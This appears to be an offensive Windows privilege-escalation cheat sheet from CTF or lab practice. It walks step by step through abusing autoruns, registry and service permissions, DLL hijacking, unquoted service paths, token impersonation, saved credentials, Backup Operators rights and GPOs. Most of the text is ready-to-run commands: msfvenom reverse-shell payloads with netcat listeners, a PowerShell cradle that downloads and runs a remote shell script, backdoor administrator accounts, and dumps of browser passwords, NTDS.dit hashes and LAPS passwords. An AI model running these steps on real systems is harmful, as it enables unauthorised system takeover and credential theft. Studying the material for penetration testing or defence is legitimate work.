Autorun is a type of Registry Escalation.
To ensure that the IT department creates a secure environment, Windows administrators often need to know what kind of access specific users or groups have to resources, including files, directories, Registry keys, global objects, and Windows services. AccessChk quickly answers these questions with an intuitive interface and output.
So basically, we can say a particular application in a specific directory gets automatically executed with administrator privileges once he logs on. This can be abused by finding the path location and dropping our malicious executable file through which we will gain administrator access.
- Transfer Autoruns64.exe on the Windows/AD machine and execute it on cmd
C:\Temp> Autoruns64.exe
- In Autoruns, click on the
"Logon"tab. - From the listed results, notice that the
"My Program"entry is pointing to"C:\Program Files\Autorun Program\program.exe". - Go back to the command prompt run AccessChk64.exe
C:\Temp> accesschk64.exe -wvu "C:\Program Files\Autorun Program"
# Switch meaning
# w --> only show items that have write access
# v --> verbose; dispaly as many details as possible
# u --> ignore the errors
- Run PowerUp and Run
Invoke-AllChecks(check the autoruns field)
C:\Temp> powershell -ep bypass
PS C:\Temp>. .\PowerUp.sp1
PS C:\Temp> Invoke-AllChecks
From the output, notice that the "Everyone" user group has "FILE_ALL_ACCESS" permission on the "program.exe" file. To gain administrator access, we can drop our malicious executable file by overwriting on the file.
- Start a netcat listener
$ sudo nc -nvlp 53- Open an additional command prompt and type:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[tun0 IP] LPORT=53 -f exe -o program.exe- Transfer the generated file,
program.exe, to the Windows VM.
- replace
program.exein'C:\Program Files\Autorun Program'
- Wait for a reverse shell on your kali machine.
AlwaysInstallElevated is a type of Registry Escalation.
This option is equivalent to granting full administrative rights, which can pose a massive security risk. Microsoft strongly discourages the use of this setting.
To install a package with elevated (system) privileges, set the AlwaysInstallElevated value to "1" under both of the following registry keys:
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\InstallerIf the AlwaysInstallElevated value is not set to "1" under both of the preceding registry keys, the installer uses elevated privileges to install managed applications and uses the current user's privilege level for unmanaged applications.
- Open command prompt and type:
C:\Temp> reg query HKLM\Software\Policies\Microsoft\Windows\Installer0x1means its ON
- In command prompt type:
C:\Temp>reg query HKCU\Software\Policies\Microsoft\Windows\Installer0x1means its ON
From the both output, we notice that “AlwaysInstallElevated” value is 1. Hence, we can abuse this function to get privilege escalation.
- Run Powerup.ps1 and Run
Invoke-AllChecks(check the AlwaysInstallElevated field)
C:\Temp> powershell -ep bypass
PS C:\Temp>. .\PowerUp.sp1
PS C:\Temp> Invoke-AllChecks
- Run
Write-UserAddMSIand Add backdoor user in Administrators group (Required RDP access)
- Check local Administrators
C:\Temp> net localgroup administrators
# now backdoor is added to the localgroup administrators group- Start a netcat listener
$ sudo nc -nvlp 53- Open an additional command prompt and type:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[tun0 IP] LPORT=53 -f msi -o setup.msi- Copy the generated file,
setup.msi, to the Windows VM.
- Place
'setup.msi'in'C:\Temp' - Open command prompt and type:
C:\Temp> msiexec /quiet /qn /i C:\Temp\setup.msi- Wait for a reverse shell on your kali machine.
A service registry consists of a cluster of servers that use a replication protocol to maintain consistency. Hence if we get Full Contol permission over the registry key, we can drop our malicious executable file to gain administrator access.
- Open powershell prompt and type:
C:\Temp> powershell -ep bypass
PS C:\Temp> Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
- Notice that the output suggests that user belong to
"NT AUTHORITY\INTERACTIVE"has"FullContol"permission over the registry key.
- Start a netcat listener
$ sudo nc -nvlp 53- Open an additional command prompt and type:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[tun0 IP] LPORT=53 -f exe -o x.exe- Copy the generated file
x.exe, to the Windows VM.
- Place
x.exein'C:\Temp' - Open command prompt at type:
C:\Temp> reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f- In the command prompt type:
C:\Temp> sc start regsvc
# If it doesnt work try restaring the service and perform the exploit egain
- Wait for a reverse shell on your kali machine.
Microsoft Windows services, formerly known as NT services, enable you to create long-running executable applications that run in their own Windows sessions. These services can be automatically started when the computer boots, can be paused and restarted, and do not show any user interface.
Hence if we get Full Contol permission over the file path location, we can drop our malicious executable file to gain administrator access.
- Run Powerup.ps1 and Run
Invoke-AllChecks(check the service executable field)
C:\Temp> powershell -ep bypass
PS C:\Temp>. .\PowerUp.sp1
PS C:\Temp> Invoke-AllChecks
We can see that we have Modifiable File access to "c:\Program Files\File Permissions Service\filepermservice.exe". To gain administrator access, we can drop our malicious executable file on this location.
- Start a netcat listener
$ sudo nc -nvlp 53- Open an additional command prompt and type:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[tun0 IP] LPORT=53 -f exe -o x.exe- Copy the generated file
x.exe, to the Windows VM and replace it overfilepermsvc.exe.
- In command prompt type:
C:\Temp> sc start filepermsvc- Wait for a reverse shell on your kali machine.
Startup apps run in the background, the number of apps running on the system can be significantly more than what the user is aware of and affect system responsiveness. Startup apps are classified to include those leveraging these mechanisms to start:
- Run registry keys (HKLM, HKCU, wow64 nodes included)
- RunOnce registry keys
- Startup folders under the start menu for per user and public locations
So basically, we need full access to the Startup folder. Then by dropping our malicious executable file, we will gain administrator access.
- Open command prompt and type:
C:\Temp> icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
- From the output notice that the
"BUILTIN\Users"group has full access'(F)'to the directory.
- Start a netcat listener
$ sudo nc -nvlp 53- Open an additional command prompt and type:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[tun0 IP] LPORT=53 -f exe -o y.exe- Copy the generated file,
y.exe, to the Windows VM.
- Place
y.exein"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup".
- Wait for a reverse shell on your kali machine.
Windows applications usually load DLL files when started. It may happen that a DLL file does not exist and the application is unable to load it. Nevertheless, an application will continue to execute as long as the missing DLL is not needed.
In case the application uses a relative and not an absolute file path, Windows searches for the file in the following directories:
- The directory from which the application is loaded
C:\Windows\System32C:\Windows\SystemC:\Windows- The current working directory
- Directories in the system PATH environment variable
- Directories in the user PATH environment variable
- Identify vulnerable application and location
- Identify applications PID
- Identify vulnerable DLLs that can be hijacked
- Use MSFVenom or other payload creation tools to create a malicious DLL
- Replace the original DLL with the malicious DLL
- Profit
- Transfer Procmon.exe on the Windows VM
- Right click on
Procmon.exeand select'Run as administrator'from the menu. - In procmon, select
"filter". From the left-most drop down menu, select'Process Name'. - In the input box on the same line type:
dllhijackservice.exe - Make sure the line reads “Process Name is
dllhijackservice.exethen Include” and click on the'Add'button, then'Apply'and lastly on 'OK'. - Next, select from the left-most drop down menu
'Result'. - In the input box on the same line type:
NAME NOT FOUND. - Make sure the line reads “Result is NAME NOT FOUND then Include” and click on the
'Add'button, then'Apply'and lastly on 'OK'.
- Open command prompt and type:
C:\Temp> sc start dllsvc
- Scroll to the bottom of the window. One of the highlighted results shows that the service tried to execute
'C:\Temp\hijackme.dll'yet it could not do that as the file was not found. Note that'C:\Temp'is a writable location.
- Start a netcat listener
$ sudo nc -nvlp 53- Open an additional command prompt and type:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[tun0 IP] LPORT=53 -f dll -o hijackme.dll- Copy the generated file
hijackme.dll, to the Windows VM.
- Place
hijackme.dllin'C:\Temp' - Open command prompt and type:
C:\Temp> sc stop dllsvc & sc start dllsvc- Wait for a reverse shell on your kali machine.
BinPath is a type of Service Escalation. We can gain administrator privileges if we write access and restart access on any service. We can abuse this function by injecting our malicious BinPath to get executed once restarted.
- Run Powerup.ps1 and Run
Invoke-AllChecks(check the service permissions field)
C:\Temp> powershell -ep bypass
PS C:\Temp>. .\PowerUp.sp1
PS C:\Temp> Invoke-AllChecks
- Run AccessChk64.exe
C:\Temp> accesschk64.exe -uwcv Everyone *
# Switch meaning
# w --> only show items that have write access
# v --> verbose; dispaly as many details as possible
# u --> ignore the errors
# c --> displays service name of the following
# Everyone --> means everyone as a group who hass access
- Using AccessChk64.exe query the service found
C:\Temp> accesschk64.exe -uwcv daclsvc
- Find path of the bin file
C:\Temp> sc qc daclsvc
- Start a netcat listener
$ sudo nc -nvlp 53- Open an additional command prompt and type:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[tun0 IP] LPORT=53 -f exe -o reverse.exe- Copy the generated file
reverse.exe, to the Windows VM.
- Place
reverse.exein'C:\Temp' - In command prompt type:
C:\Temp> sc config daclsvc binpath= "C:\Temp\reverse.exe"- In command prompt type:
C:\Temp> sc start daclsvc- Wait for a reverse shell on your kali machine.
When a service is created whose executable path contains spaces and isn’t enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges (only if the vulnerable service is running with SYSTEM privilege).
In Windows, if the service is not enclosed within quotes and is having spaces, it would handle the space as a break and pass the rest of the service path as an argument.
- Run Powerup.ps1 and Run
Invoke-AllChecks(check the unquoted service field)
C:\Temp> powershell -ep bypass
PS C:\Temp>. .\PowerUp.sp1
PS C:\Temp> Invoke-AllChecks
- Start a netcat listener
$ sudo nc -nvlp 53- Open an additional command prompt and type:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[tun0 IP] LPORT=53 -f exe -o common.exe- Transfer the generated file,
common.exe, to the Windows VM.
- Place
common.exein'C:\Program Files\Unquoted Path Service'. - Open command prompt and type:
C:\Temp> sc start unquotedsvc
# OR
C:\Temp> net start unquotedsvc- Wait for a reverse shell on your kali machine.
This privilege allows us to impersonate a token of a privileged account such as NT AUTHORITY\SYSTEM.
- We should have
SeImpersonatePrivilegeprivileges enabled
C:\Temp>whoami /priv
- Copy
Invoke-PowerShellTcp.ps1from nishang shells asshell.ps1 - Add the line at the bottom of
shell.ps1
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.31 -Port 9999- Lets create a
shell.batfile
powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.31/shell.ps1')- Transfer
shell.batandjuicypotato.exeon victim machine
$ (new-object net.webclient).downloadfile('http://10.10.14.31/file', 'C:\temp\file')- Set a listener on port 9999
$ sudo rlwrap nc -lnvp 9999- Run juicy potato
$ ./jp.exe -p shell.bat -l 7777 -t *- If this fail
- Try with a different CLSID depending upon the system version and select the CLSID which supports NT AUTHORITY\SYSTEM
- Link --> http://ohpe.it/juicy-potato/CLSID
- Lets run again
$ ./jp.exe -p shell.bat -l 7777 -t * -c "{e60687f7-01a1-40aa-86ac-db1cbf673334}"- Wait for a reverse shell on your kali machine.
Hot Potato takes advantage of known issues in Windows to gain local privilege escalation in default configurations, namely NTLM relay (specifically HTTP->SMB relay) and NBNS spoofing.
- We should have
SeImpersonatePrivilegeprivileges enabled
C:\Temp> whoami /priv
I will be demonstrating a simple exploitation technique by adding a user to the local administrators group using Tater.ps1
- Enter the following to gain administrator access
C:\Temp> powershell.exe -nop -ep bypass
PS C:\Temp> Import-Module C:\Temp\Tater.ps1
PS C:\Temp> Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"This method is handy for checking any existing exploits available for the machine by looking at the system information. From the results of windows-exploit-suggester.py we can select one of the kernel exploits and try to escalate privileges.
- Run systeminfo and save it into a text file
C:\Temp> systeminfo- Pass the file thorugh windows-exploit-suggester.py
$ ./windows-exploit-suggester.py --update
[*] initiating...
[*] successfully requested base url
[*] scraped ms download url
[+] writing to file 2020-06-06-mssb.xlsx
[*] done
$ ./windows-exploit-suggester.py --database 2020-06-06-mssb.xlsx --systeminfo systeminfo.txt
Exploits will be displayed here...- winpeas
- Path location :
C:\Temp> C:\Users\usernamehere\AppData\Roaming\Mozilla\Firefox\ProfilesCopy the following files from the Windows VM to Kali VM:
- key4.db
- logins.json
- addons.json
- cert9.db
- Download the following
$ git clone https://github.com/lclevy/firepwd.git- Place the required files in the same directory and run the python file for the creds
$ python3 firepwd.py
globalSalt: b'2d45b7ac4e42209a23235ecf825c018e0382291d'
<SNIP>
clearText b'86a15457f119f862f8296e4f2f6b97d9b6b6e9cb7a3204760808080808080808'
decrypting login/password pairs
https://creds.com:b'mayor',b'<<HIDDEN>>'We can check if there are any pre-existing credentials of the administrator on the system. We can abuse this by using the loaded creds for privilege escalation. In the below example, I will demonstrate how to read files through the saved creds.
- winpeas
- Checking for existence
$ cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator- Reading root flag
C:\Temp> C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "C:\Windows\System32\cmd.exe /c TYPE c:\Users\Administrator\Desktop\root.txt > C:\Users\security\root1.txt"If the user is a part of the Backup Operator group, the user has the ability to create system backups and could be used to obtain copies of sensitive system files that can be used to retrieve passwords such as the SAM and SYSTEM Registry hives and the NTDS.dit Active Directory database file.
- The user should be a part of the Backup Operators group and should have SeBackupPrivilege and SeRestorePrivilege Enabled
C:\Temp> net user unsername-here
C:\Temp> whoami /all- Create this script and transfer it to Windows VM
set verbose onX
set metadata C:\Windows\Temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backupX- Pass the script to diskshadow unility to create the shadow copy
PS C:\Temp> diskshadow /s script.txt- Now copy the NTDS file using Robocopy to the Temp file we created in the C: drive
PS C:\Temp> robocopy /b E:\Windows\ntds . ntds.dit- Next we get the system registry hive that contains the key needed to decrypt the NTDS file with reg save command.
PS C:\Temp> reg save hklm\system c:\temp\system.hive- We can use
secretsdump.pydo decrypt the DA creds on Kali VM
$ secretsdump.py -ntds ntds.dit -system system.hive LOCAL | tee hash-dumpWe Abusing GPO by adding the user to the local Administrators group leveraging a tool called SharpGPOAbuse.
Source : https://github.com/FSecureLABS/SharpGPOAbuse
Pre compiled binaries : https://github.com/Flangvik/SharpCollection
- Add user to local administrator groups
PS C:\Enterprise-Share> .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Debug" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"
[+] Domain = vulnnet.local
[+] Domain Controller = VULNNET-BC3TCK1SHNQ.vulnnet.local
[+] Distinguished Name = CN=Policies,CN=System,DC=vulnnet,DC=local
[+] GUID of "SECURITY-POL-VN" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] Creating file \\vulnnet.local\SysVol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!- Force Update the system
PS C:\Enterprise-Share> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.- Now review our group memberships after we forced the policies to be updated on the target machine.
PS C:\Enterprise-Share> net user enterprise-security
# Will be added to the administrators groupThe following script assumes that LAPS has already been configured into your environment & that your user account already has access to view LAPS passwords using the Fat Client UI or from Active Directory Users & Computers.
This script loads the Active Directory module, finds the LAPS password fields, and then saves them to a CSV with the date appended to the file name. The only thing you’d need to change is the file path.
- Just Open Powershell and paste this script
$Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$computers | Export-Csv -path c:\temp\"LAPS-$((Get-Date).ToString("MM-dd-yyyy")).csv" -NoTypeInformation- Then, save it to the location of your choice. For this example, I’m saving to
C:\Scripts\LAPSexport.ps1- Then, run the script to verify it works correctly. If it does, you should automate this procedure by creating a Scheduled Task.